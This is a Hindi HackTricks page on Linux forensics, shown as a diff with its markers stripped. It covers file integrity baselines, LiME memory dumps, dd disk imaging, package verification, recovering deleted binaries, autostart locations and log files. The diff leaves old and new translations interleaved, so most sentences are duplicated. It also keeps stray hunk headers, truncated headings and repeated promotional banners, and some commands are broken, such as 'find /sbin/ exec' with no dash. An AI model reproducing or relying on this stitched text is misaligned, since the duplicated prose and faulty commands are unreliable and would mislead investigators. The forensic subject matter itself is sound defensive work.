* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर **फॉलो** करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें** और PRs सबमिट करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
# बेसलाइ
# मूल्यांक
एक बेसलाइन में एक सिस्टम के कुछ हिस्सों का एक स्नैपशॉट लेना शामिल है ताकि इसे भविष्य की स्थिति के साथ तुलना करने के लिए परिवर्तनों को हाइलाइट किया जा सके
एक मूल्यांकन में एक सिस्टम के कुछ हिस्सों का एक स्नैपशॉट लेना शामिल है ताकि **बदलावों को हाइलाइट करने के लिए एक भविष्य की स्थिति के साथ तुलना की जा सके**
उदाहरण के लिए, आप फाइल सिस्टम की प्रत्येक फ़ाइल का हैश की गणना करके और स्टोर करके उसे संशोधित किए गए फ़ाइलें पता लगाने के लिए संचित कर सकते हैं।\
यह उपयोगकर्ता खाते बनाए गए, प्रक्रियाएँ चल रही हैं, सेवाएँ चल रही हैं और किसी भी अन्य चीज़ के साथ भी किया जा सकता है जो बहुत अधिक परिवर्तित नहीं होना चाहिए, या बिल्कुल नहीं
उदाहरण के लिए, आप फाइल सिस्टम की प्रत्येक फ़ाइल का हैश कैलकुलेट और स्टोर कर सकते हैं ताकि आप पता लगा सकें कि कौन सी फ़ाइलें संशोधित की गई थीं।\
इसे उपयोगकर्ता खाते बनाए गए, प्रक्रियाएँ चल रही हैं, सेवाएँ चल रही हैं और किसी भी अन्य चीज़ के साथ भी किया जा सकता है जो बहुत अधिक या पूरी तरह से बदलना नहीं चाहिए
## फ़ाइल अखंडता मॉनिटरिंग
फ़ाइल अखंडता मॉनिटरिंग एक ऐसा शक्तिशाली तकनीक है जो कई प्रकार के जाने और अज्ञात खतरों के खिलाफ IT ढांचे और व्यावसायिक डेटा को सुरक्षित रखने के लिए उपयोग किया जाता है।\
उद्देश्य एक **बेसलाइन उत्पन्न करना** है जिसमें आप जिन फ़ाइलों को मॉनिटर करना चाहते हैं उन सभी फ़ाइलों का एक **बेसलाइन** बनाना और फिर **नियमित अंतराल** पर उन फ़ाइलों की **संभावित परिवर्तनों** की जांच करना है (सामग्री, गुणवत्ता, मेटाडेटा आदि में).
फ़ाइल अखंडता मॉनिटरिंग (FIM) एक महत्वपूर्ण सुरक्षा तकनीक है जो फ़ाइलों में परिवर्तनों का ट्रैक करके IT वातावरण और डेटा की सुरक्षा करती है। इसमें दो मुख्य कदम शामिल हैं:
1\. **बेसलाइन तुलना,** जिसमें एक या एक से अधिक फ़ाइल गुणवत्ताएँ कैप्चर या गणित की जाएंगी और एक बेसलाइन के रूप में स्टोर की जाएंगी जिसे भविष्य में तुलना के लिए तुलना की जा सकती है। यह फ़ाइल के समय और तारीख के रूप में साधारण हो सकता है, हालांकि, क्योंकि यह डेटा आसानी से धोखा दे सकता है, इसके लिए आमतौर पर एक अधिक विश्वसनीय दृष्टिकोण का उपयोग किया जाता है। इसमें नियमित अंतराल पर मॉनिटर की गई फ़ाइल के लिए एक और अद्वितीय चेकसम का मूल्यांकन करना शामिल हो सकता है, (जैसे MD5 या SHA-2 हैशिंग एल्गोरिथ्म का उपयोग करके) और फिर पिछले गणना किए गए चेकसम के साथ परिणाम की तुलना करना।
2\. **रियल-टाइम परिवर्तन सूचना,** जो आमतौर पर ऑपरेटिंग सिस्टम के कर्नल के भीतर या एक विस्तार के रूप में कार्यान्वित किया जाता है जो जब एक फ़ाइल तक पहुंचा जाता है या संशोधित किया जाता है तो झंडा दिखाएगा।
1. **मूल्यांकन तुलना:** भविष्य की तुलना के लिए फ़ाइल गुणांक या एन्क्रिप्टेड चेकसम्स (जैसे MD5 या SHA-2) का उपयोग करके एक मूल्यांकन स्थापित करें ताकि संशोधनों का पता लगा सकें।
2. **रियल-टाइम चेंज नोटिफिकेशन:** फ़ाइलों तक पहुंचने या संशोधित किए जाने पर तुरंत अलर्ट प्राप्त करें, आम तौर पर OS कर्नल एक्सटेंशन के माध्यम से।
## उपकरण

View file

@ -3,30 +3,30 @@
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) का उपयोग करें और आसानी से **समुदाय के सबसे उन्नत उपकरणों** द्वारा संचालित **कार्यप्रवाह** बनाएं और स्वचालित करें।\
[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) का उपयोग करें और आसानी से **वर्ल्ड के सबसे उन्नत समुदाय उपकरणों** द्वारा संचालित **ऑटोमेट वर्कफ़्लो** बनाएं।\
आज ही पहुंचें:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
<details>
<summary><strong>शून्य से हीरो तक AWS हैकिंग सीखें</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
<summary><strong>जीरो से हीरो तक AWS हैकिंग सीखें</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ</strong>!</summary>
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप अपनी कंपनी का **विज्ञापन HackTricks में** देखना चाहते हैं या **HackTricks को PDF में डाउनलोड** करना चाहते हैं, तो [**सदस्यता योजनाएं देखें**](https://github.com/sponsors/carlospolop)!
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके।
* यदि आप अपनी कंपनी का **विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके।
</details>
## प्रारंभिक जानकारी एकत्र करना
### मौलिक जानकारी
### मूल जानकारी
सबसे पहले, सुझाव दिया जाता है कि कुछ **USB** के साथ होना चाहिए जिसमें **अच्छे जाने माने बाइनरी और लाइब्रेरी** हों (आप बस उबंटू ले सकते हैं और फोल्डर _/bin_, _/sbin_, _/lib,_ और _/lib64_ कॉपी कर सकते हैं), फिर USB को माउंट करें, और एनवायरनमेंट वेरिएबल्स को उन बाइनरीज का उपयोग करने के लिए संशोधित करें:
सबसे पहले, सुझाव दिया जाता है कि कुछ **USB** के साथ होना चाहिए जिसमें **अच्छे जाने माने बाइनरी और लाइब्रेरी** हों (आप बस उबंटू ले सकते हैं और फोल्डर _/bin_, _/sbin_, _/lib,_ और _/lib64_ कॉपी कर सकते हैं), फिर USB को माउंट करें, और env variables को उन बाइनरी का उपयोग करने के लिए संशोधित करें:
```bash
export PATH=/mnt/usb/bin:/mnt/usb/sbin
export LD_LIBRARY_PATH=/mnt/usb/lib:/mnt/usb/lib64
@ -55,19 +55,19 @@ find /directory -type f -mtime -1 -print #Find modified files during the last mi
* **रूट प्रक्रियाएँ** आम तौर पर कम PIDS के साथ चलती हैं, इसलिए अगर आप एक बड़ी PID के साथ एक रूट प्रक्रिया पाते हैं तो आप संदेह कर सकते हैं
* `/etc/passwd` में शैली बिना उपयोगकर्ताओं की **रजिस्टर्ड लॉगिन** की जांच करें
* `/etc/shadow` में **पासवर्ड हैश** की जांच करें जिन उपयोगकर्ताओं के पास एक शैल नहीं है
* `/etc/shadow` में **पासवर्ड हैश** की जांच करें जिनके पास एक शैल नहीं है
### मेमोरी डंप
चल रहे सिस्टम की मेमोरी प्राप्त करने के लिए, [**LiME**](https://github.com/504ensicsLabs/LiME) का उपयोग करना सुझावित है।\
इसे **कंपाइल** करने के लिए, आपको पीडीआई का उपयोग करना होगा जो पीडीआई यंत्र का उपयोग कर रहा है
इसे **कंपाइल** करने के लिए, आपको पीडित मशीन द्वारा उपयोग किए जा रहे **वही कर्नेल** उपयोग करना होगा
{% hint style="info" %}
ध्यान रखें कि आप **LiME या किसी अन्य चीज़ को** पीडीआई यंत्र में स्थापित नहीं कर सकते क्योंकि यह कई परिवर्तन कर देगा
ध्यान रखें कि आप **LiME या किसी अन्य चीज** को पीडित मशीन में इंस्टॉल नहीं कर सकते क्योंकि यह कई परिवर्तन कर देगा
{% endhint %}
तो, यदि आपके पास एक अभिन्न संस्करण का यूबंटू है तो आप `apt-get install lime-forensics-dkms` का उपयोग कर सकते हैं\
अन्य मामलों में, आपको [**LiME**](https://github.com/504ensicsLabs/LiME) को github से डाउनलोड करना होगा और सही कर्नेल हेडर्स के साथ इसे कंपाइल करना होगा। पीडीआई यंत्र के सटीक कर्नेल हेडर्स प्राप्त करने के लिए, आप बस अपने यंत्र में निर्देशिका `/lib/modules/<कर्नेल संस्करण>` की **नकल** कर सकते हैं, और फिर उन्हें उपयोग करके LiME को **कंपाइल** कर सकते हैं:
तो, यदि आपके पास एक वैशिष्ट्यपूर्ण संस्करण का यूबंटू है तो आप `apt-get install lime-forensics-dkms` का उपयोग कर सकते हैं\
अन्य मामलों में, आपको [**LiME**](https://github.com/504ensicsLabs/LiME) को github से डाउनलोड करना होगा और सही कर्नेल हेडर्स के साथ इसे कंपाइल करना होगा। पीडित मशीन के सटीक कर्नेल हेडर्स प्राप्त करने के लिए, आप बस अपनी मशीन पर निर्देशिका `/lib/modules/<कर्नेल संस्करण>` की **कॉपी** कर सकते हैं, और फिर उन्हें उपयोग करके LiME को **कंपाइल** कर सकते हैं:
```bash
make -C /lib/modules/<kernel version>/build M=$PWD
sudo insmod lime.ko "path=/home/sansforensics/Desktop/mem_dump.bin format=lime"
@ -84,12 +84,12 @@ LiME का उपयोग **नेटवर्क के माध्यम
#### बंद करना
सबसे पहले, आपको **सिस्टम को बंद करने** की आवश्यकता होगी। यह हमेशा एक विकल्प नहीं है क्योंकि कुछ समय सिस्टम एक उत्पादन सर्वर होगा जिसे कंपनी को बंद करने की सामर्थ्य नहीं होी।\
सिस्टम को बंद करने के **2 तरीके** हैं, एक **सामान्य बंद करना** और एक **"प्लग निकालना" बंद करना**। पहला वाला **प्रक्रियाएँ सामान्य रूप से समाप्त होने** और **फ़ाइल सिस्टम** को **समकालीन** होने देगा, लेकिन यह भी संभावित **मैलवेयर** को **सबूत नष्ट** करने की अनुमति देगा। "प्लग निकालना" दृष्टिकोण **कुछ जानकारी क हानि** ले सकता है (ज्यादातर जानकारी नष्ट नहीं होने वाली है क्योंकि हमने पहले ही मेमोरी का छवि ले ली है) और **मैलवेयर को कुछ करने का कोई मौका नहीं** होगा। इसलिए, यदि आपको लगता है कि वहाँ कोई **मैलवेयर** हो सकता है, तो सिस्टम पर **`sync`** **कमांड** को निष्पादित करें और प्लग निकालें।
सबसे पहले, आपको **सिस्टम को बंद करने** की आवश्यकता होगी। यह हमेशा एक विकल्प नहीं है क्योंकि कुछ समय सिस्टम एक उत्पादन सर्वर हो सकता है जिसे कंपनी को बंद करने की सामर्थ्य नहीं होी।\
सिस्टम को बंद करने के **2 तरीके** हैं, एक **सामान्य बंद करना** और एक **"प्लग निकालना" बंद करना**। पहला वाला **प्रक्रियाएँ सामान्य रूप से समाप्त करने** और **फ़ाइल सिस्टम** को **समकालीन** करने की अनुमति देगा, लेकिन यह भी संभावित **मैलवेयर** को **सबूत नष्ट** करने की अनुमति देगा। "प्लग निकालना" दृष्टिकोण **कुछ जानकारी क हानि** ले सकता है (ज्यादातर जानकारी नष्ट नहीं होने वाली है क्योंकि हमने पहले ही मेमोरी का छवि ले ली है) और **मैलवेयर को कुछ करने का कोई मौका नहीं** होगा। इसलिए, यदि आपको लगता है कि वहाँ कोई **मैलवेयर** हो सकता है, तो सिस्टम पर **`sync`** **कमांड** को निष्पादित करें और प्लग निकालें।
#### डिस्क की छवि लेना
यह महत्वपूर्ण है कि **मामले से संबंधित किसी भी चीज़ को अपने कंप्यूटर से कनेक्ट करने से पहले**, आपको यह सुनिश्चित करना होगा कि यह **केवल पढ़ने के लिए माउंट** किया जाएगा ताकि कोई भी जानकारी को संशोधित न करें
यह महत्वपूर्ण है कि **मामले से संबंधित कुछ भी अपने कंप्यूटर को कनेक्ट करने से पहले**, आपको यह सुनिश्चित करना होगा कि यह **केवल पढ़ने के लिए माउंट** किया जाएगा ताकि कोई भी जानकारी में कोई परिवर्तन न हो
```bash
#Create a raw copy of the disk
dd if=<subject device> of=<image file> bs=512
@ -156,8 +156,8 @@ ThisisTheMasterSecret
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
[**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) का उपयोग करें और **ऑटोमेट वर्कफ़्लो** बनाएं जो दुनिया के **सबसे उन्नत** समुदाय उपकरणों द्वारा संचालित हो।\
आज ही पहुंच प्राप्त करें:
[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) का उपयोग करें और दुनिया के सबसे उन्नत समुदाय उपकरणों द्वारा संचालित **कार्यप्रवाहों** को आसानी से निर्मित करें और स्वचालित करें।\
आज ही पहुंचें:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
@ -165,17 +165,14 @@ ThisisTheMasterSecret
### संशोधित सिस्टम फ़ाइलें
कुछ लिनक्स सिस्टमों में बहुत सारे स्थापित घटकों की अखंडता की पुष्टि करने की विशेषता होती है, जो असामान्य या अनुचित फ़ाइलों की पहचान के लिए एक प्रभावी तरीका प्रदान करती है। उदाहरण के लिए, लिनक्स पर `rpm -Va` का उपयोग रेडहैट पैकेज प्रबंधक का उपयोग करके स्थापित सभी पैकेज की पुष्टि करने के लिए डिज़ाइन किया गया है।
```bash
#RedHat
rpm -Va
#Debian
dpkg --verify
debsums | grep -v "OK$" #apt-get install debsums
```
Linux सिस्टम के घातकता की सुनिश्चिति के लिए उपकरण प्रदान करता है, जो संभावित समस्यात्मक फ़ाइलों को पहचानने में महत्वपूर्ण है।
- **RedHat आधारित सिस्टम**: व्यापक जांच के लिए `rpm -Va` का उपयोग करें।
- **Debian आधारित सिस्टम**: प्रारंभिक सत्यापन के लिए `dpkg --verify` का उपयोग करें, और फिर `debsums | grep -v "OK$"` (जिसके बाद `apt-get install debsums` के साथ `debsums` को स्थापित करें) का उपयोग करें किसी भी समस्याओं की पहचान के लिए।
### मैलवेयर/रूटकिट डिटेक्टर्स
निम्नलिखित पृष्ठ को पढ़ें ताकि आप मैलवेयर को खोजने के लिए उपयोगी टूल्स के बारे में जान सकें:
मैलवेयर खोजने के लिए उपयोगी उपकरणों के बारे में जानने के लिए निम्नलिखित पृष्ठ पढ़ें:
{% content-ref url="malware-analysis.md" %}
[malware-analysis.md](malware-analysis.md)
@ -183,46 +180,47 @@ debsums | grep -v "OK$" #apt-get install debsums
## स्थापित कार्यक्रमों की खोज
### पैकेज प्रबंधक
Debian और RedHat सिस्टमों पर स्थापित कार्यक्रमों की प्रभावी खोज करने के लिए, सामान्य निरीक्षण के साथ सिस्टम लॉग और डेटाबेस का उपयोग करें जो साथ ही साथ मैनुअल जांचों को सामान्य निरीक्षण करें।
डेबियन-आधारित सिस्टमों पर, _**/var/ lib/dpkg/status**_ फ़ाइल में स्थापित पैकेज के विवरण होते हैं और _**/var/log/dpkg.log**_ फ़ाइल में जानकारी रिकॉर्ड होती है जब एक पैकेज स्थापित होता है।\
रेडहैट और संबंधित लिनक्स वितरणों पर **`rpm -qa --root=/ mntpath/var/lib/rpm`** कमांड एक सिस्टम पर एक आरपीएम डेटाबेस की सामग्री की सूची देगी।
- Debian के लिए, **_`/var/lib/dpkg/status`_** और **_`/var/log/dpkg.log`_** की जांच करें पैकेज स्थापनाओं के बारे में विवरण प्राप्त करने के लिए, `grep` का उपयोग करें विशिष्ट जानकारी के लिए।
- RedHat उपयोगकर्ता RPM डेटाबेस को `rpm -qa --root=/mntpath/var/lib/rpm` के साथ क्वेरी कर सकते हैं ताकि स्थापित पैकेजों की सूची बना सकें।
इन पैकेज प्रबंधकों के बाहर मैन्युअल या स्थापित सॉफ़्टवेयर को खोजने के लिए, **_`/usr/local`_**, **_`/opt`_**, **_`/usr/sbin`_**, **_`/usr/bin`_**, **_`/bin`_**, और **_`/sbin`_** जैसे निर्देशिकाओं का अन्वेषण करें। जानकारी के लिए निर्देशिका सूचियों को सिस्टम-विशेष आदेशों के साथ मिलाकर पहचानें जिन्हें जाने गए पैकेजों से जोड़ा नहीं गया है, सभी स्थापित कार्यक्रमों की खोज को बढ़ावा देने के लिए।
```bash
#Debian
# Debian package and log details
cat /var/lib/dpkg/status | grep -E "Package:|Status:"
cat /var/log/dpkg.log | grep installed
#RedHat
rpm -qa --root=/ mntpath/var/lib/rpm
```
### अन्य
**उपर्युक्त कमांड्स द्वारा सभी स्थापित कार्यक्रमों की सूची नहीं होगी** क्योंकि कुछ एप्लिकेशन कुछ विशिष्ट सिस्टमों के लिए पैकेज के रूप में उपलब्ध नहीं होते हैं और स्रोत से स्थापित करना पड़ता है। इसलिए, _**/usr/local**_ और _**/opt**_ जैसी स्थानों की समीक्षा अन्य एप्लिकेशनों को प्रकट कर सकती है जो स्रोत कोड से संकलित और स्थापित किए गए हों।
```bash
ls /opt /usr/local
```
एक और अच्छा विचार है **$PATH** के अंदर **सामान्य फोल्डर** की **जाँच करना** जो **इंस्टॉल किए गए पैकेज** से **संबंधित नहीं** हैं:
```bash
#Both lines are going to print the executables in /sbin non related to installed packages
#Debian
# RedHat RPM database query
rpm -qa --root=/mntpath/var/lib/rpm
# Listing directories for manual installations
ls /usr/sbin /usr/bin /bin /sbin
# Identifying non-package executables (Debian)
find /sbin/ -exec dpkg -S {} \; | grep "no path found"
#RedHat
# Identifying non-package executables (RedHat)
find /sbin/ exec rpm -qf {} \; | grep "is not"
# Find exacuable files
find / -type f -executable | grep <something>
```
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) का उपयोग करें और आसानी से **ऑटोमेट वर्कफ़्लो** बनाएं जो दुनिया के **सबसे उन्नत** समुदाय उपकरणों द्वारा संचालित ह।\
[**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) का उपयोग करें और आसानी से **ऑटोमेट वर्कफ़्लो** बनाएं जो दुनिया के **सबसे उन्नत** समुदाय उपकरणों द्वारा संचालित हैं।\
आज ही पहुंच प्राप्त करें:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
## हटाए गए चल रहे बाइनरी को पुनः प्राप्त करें
![](<../../.gitbook/assets/image (641).png>)
## हटाए गए चल रहे बाइनरी को बहाल करें
कल्पना करें एक प्रक्रिया जो /tmp/exec से निष्पादित की गई थी और हटा दी गई थी। इसे निकालना संभव है
```bash
cd /proc/3746/ #PID with the exec file deleted
head -1 maps #Get address of the file. It was 08048000-08049000
dd if=mem bs=1 skip=08048000 count=1000 of=/tmp/exec2 #Recorver it
```
## ऑटोस्टार्ट स्थानों की जांच करें
### निर्धारित कार्याएँ
### निर्धारित कार्यों
```bash
cat /var/spool/cron/crontabs/* \
/var/spool/cron/atjobs \
@ -238,63 +236,76 @@ ls -l /usr/lib/cron/tabs/ /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Libra
```
### सेवाएं
मैलवेयर के लिए एक नए, अनधिकृत सेवा के रूप में अपने आप को अंकुरित करना बहुत सामान्य है। लिनक्स में कई स्क्रिप्ट हैं जो कंप्यूटर बूट होते समय सेवाएं शुरू करने के लिए उपयोग किए जाते हैं। प्रारंभी स्टार्टअप स्क्रिप्ट _**/etc/inittab**_ अन्य स्क्रिप्टों को बुलाता है जैसे rc.sysinit और _**/etc/rc.d/**_ निर्देशिका के तहत विभिन्न स्टार्टअप स्क्रिप्ट, या कुछ पुराने संस्करणों में _**/etc/rc.boot/**_। अन्य लिनक्स संस्करणों पर, जैसे डेबियन, स्टार्टअप स्क्रिप्ट _**/etc/init.d/**_ निर्देशिका में संग्रहीत होते हैं। साथ ही, कुछ सामान्य सेवाएं _**/etc/inetd.conf**_ या _**/etc/xinetd/**_ में सक्षम की जाती हैं लिनक्स के संस्करण के आधार पर। डिजिटल जांचकर्ताओं को इन स्टार्टअप स्क्रिप्ट की हर अनूठी प्रविष्टियों की जांच करनी चाहिए।
मालवेयर को सेवा के रूप में स्थापित किया जा सकता है इन पथों पर:
- **/etc/inittab**: rc.sysinit जैसे प्रारंभीकरण स्क्रिप्ट को बुलाता है, जो आगे स्टार्टअप स्क्रिप्ट्स की ओर निर्देशित करता है।
- **/etc/rc.d/** और **/etc/rc.boot/**: सेवा स्टार्टअप के लिए स्क्रिप्ट्स को रखता है, जिसमें पुराने Linux संस्करणों में दूसरा मिलता है।
- **/etc/init.d/**: Debian जैसे कुछ Linux संस्करणों में स्टार्टअप स्क्रिप्ट्स को स्टोर करने के लिए उपयोग किया जाता है।
- सेवाएं **/etc/inetd.conf** या **/etc/xinetd/** के माध्यम से भी सक्रिय की जा सकती है, जो Linux प्रकार पर निर्भर करता है।
- **/etc/systemd/system**: सिस्टम और सेवा प्रबंधक स्क्रिप्टों के लिए एक निर्देशिका।
- **/etc/systemd/system/multi-user.target.wants/**: मल्टी-यूजर रनलेवल में शुरू किए जाने चाहिए सेवाओं के लिंक्स को रखता है।
- **/usr/local/etc/rc.d/**: कस्टम या थर्ड-पार्टी सेवाओं के लिए।
- **~/.config/autostart/**: उपयोगकर्ता-विशिष्ट स्वचालित स्टार्टअप एप्लिकेशन के लिए, जो उपयोगकर्ता-लक्षित मालवेयर के लिए एक छिपने की जगह हो सकता है।
- **/lib/systemd/system/**: सिस्टम-वाइड डिफ़ॉल्ट यूनिट फ़ाइलें इंस्टॉल किए गए पैकेज्स द्वारा प्रदान की जाती हैं।
* _**/etc/inittab**_
* _**/etc/rc.d/**_
* _**/etc/rc.boot/**_
* _**/etc/init.d/**_
* _**/etc/inetd.conf**_
* _**/etc/xinetd/**_
* _**/etc/systemd/system**_
* _**/etc/systemd/system/multi-user.target.wants/**_
### कर्नेल मॉड्यूल
लिनक्स सिस्टम पर, कर्नेल मॉड्यूल मैलवेयर पैकेज के लिए रूटकिट घटक के रूप में आमतौर पर उपयोग किए जाते हैं। कर्नेल मॉड्यूल सिस्टम बूट होने पर `/lib/modules/'uname -r'` और `/etc/modprobe.d` निर्देशिकाओं में कॉन्फ़िगरेशन सूचना के आधार पर लोड होते हैं, और `/etc/modprobe` या `/etc/modprobe.conf` फ़ाइल। इन क्षेत्रों की जांच करनी चाहिए जो मैलवेयर से संबंधित हैं।
लिनक्स कर्नेल मॉड्यूल, जो अक्सर मालवेयर द्वारा रूटकिट घटक के रूप में उपयोग किए जाते हैं, सिस्टम बूट पर लोड होते हैं। इन मॉड्यूल के लिए महत्वपूर्ण निर्देशिकाएं और फ़ाइलें शामिल हैं:
### अन्य ऑटोस्टार्ट स्थान
- **/lib/modules/$(uname -r)**: चल रहे कर्नेल संस्करण के लिए मॉड्यूल्स को रखता है।
- **/etc/modprobe.d**: मॉड्यूल लोडिंग को नियंत्रित करने के लिए कॉन्फ़िगरेशन फ़ाइलें शामिल हैं।
- **/etc/modprobe** और **/etc/modprobe.conf**: वैश्विक मॉड्यूल सेटिंग्स के लिए फ़ाइलें।
लिनक्स कई विन्यास फ़ाइलों का उपयोग करता है जो स्वचालित रूप से एक कार्यक्षमता को लॉग इन करने पर लॉन्च करने के लिए हो सकती हैं जो मैलवेयर के अनुकरण को शामिल कर सकती हैं।
### अन्य स्वचालित स्थान
* _**/etc/profile.d/\***_ , _**/etc/profile**_ , _**/etc/bash.bashrc**_ जब कोई भी उपयोगकर्ता खाता लॉग इन करता है तो इन्हें निष्पादित किया जाता है।
* _**/.bashrc**_ , _**/.bash\_profile**_ , _**\~/.profile**_ , _**/.config/autostart**_ जब विशिष्ट उपयोगकर्ता लॉग इन करता है तो इन्हें निष्पादित किया जाता है।
* _**/etc/rc.local**_ इसे पारंपरिक रूप से उन सभी साधारण सिस्टम सेवाओं के बाद निष्पादित किया जाता है, प्रोसेस के अंत में एक मल्टीयूजर रनलेवल में स्विच करने की प्रक्रिया के बाद।
लिनक्स उपयोगकर्ता लॉगिन पर स्वचालित रूप से कार्यों को निष्पादित करने के लिए विभिन्न फ़ाइलें उपयोग करता है, जो संभावित रूप से मालवेयर को छुपाने के लिए हो सकते हैं:
- **/etc/profile.d/***, **/etc/profile**, और **/etc/bash.bashrc**: किसी भी उपयोगकर्ता लॉगिन के लिए निष्पादित किया जाता है।
- **~/.bashrc**, **~/.bash_profile**, **~/.profile**, और **~/.config/autostart**: उपयोगकर्ता-विशिष्ट फ़ाइलें जो उनके लॉगिन पर चलती हैं।
- **/etc/rc.local**: सभी सिस्टम सेवाएं शुरू होने के बाद चलता है, जो मल्टीयूजर परिवेश में स्थानांतरण के अंत को चिह्नित करता है।
## लॉग की जांच
कंप्रोमाइज़ सिस्टम पर उपलब्ध सभी लॉग फ़ाइलों में दुर्भाग्यपूर्ण निष्पादन और संबंधित गतिविधियों के लिए खोजें जैसे कि एक नई सेवा का निर्माण।
लिनक्स सिस्टम विभिन्न लॉग फ़ाइलों के माध्यम से उपयोगकर्ता गतिविधियों और सिस्टम घटनाओं का ट्रैक करता है। ये लॉग अनधिकृत पहुंच, मालवेयर संक्रमण, और अन्य सुरक्षा घटनाओं की पहचान के लिए महत्वपूर्ण हैं। मुख्य लॉग फ़ाइलें शामिल हैं:
### शुद्ध लॉग
- **/var/log/syslog** (Debian) या **/var/log/messages** (RedHat): सिस्टम-व्यापी संदेश और गतिविधियों को कैप्चर करते हैं।
- **/var/log/auth.log** (Debian) या **/var/log/secure** (RedHat): प्रमाणीकरण प्रयासों, सफल और असफल लॉगिन को रिकॉर्ड करते हैं।
- `grep -iE "session opened for|accepted password|new session|not in sudoers" /var/log/auth.log` का उपयोग संबंधित प्रमाणीकरण घटनाओं को फ़िल्टर करने के लिए करें।
- **/var/log/boot.log**: सिस्टम स्टार्टअप संदेशों को शामिल करता है।
- **/var/log/maillog** या **/var/log/mail.log**: ईमेल सर्वर गतिविधियों को लॉग करता है, जो ईमेल संबंधित सेवाओं का ट्रैकिंग करने के लिए उपयोगी है।
- **/var/log/kern.log**: कर्नेल संदेशों को स्टोर करता है, जिसमें त्रुटियाँ और चेतावनियाँ शामिल हैं।
- **/var/log/dmesg**: डिवाइस ड्राइवर संदेशों को रखता है।
- **/var/log/faillog**: असफल लॉगिन प्रयासों को रिकॉर्ड करता है, सुरक्षा उल्लंघन जांच में मदद करता है।
- **/var/log/cron**: क्रॉन जॉब क्रियाएँ लॉग करता है।
- **/var/log/daemon.log**: पिछले सेवा गतिविधियों का ट्रैक करता है।
- **/var/log/btmp**: असफल लॉगिन प्रयासों को दस्तावेज़ करता है।
- **/var/log/httpd/**: Apache HTTPD त्रुटि और एक्सेस लॉग्स को शामिल करता है।
- **/var/log/mysqld.log** या **/var/log/mysql.log**: MySQL डेटाबेस गतिविधियों को लॉग करता है।
- **/var/log/xferlog**: FTP फ़ाइल स्थानांतरण को रिकॉर्ड करता है।
- **/var/log/**: यहाँ अप्रत्याशित लॉग के लिए हमेशा जांच करें।
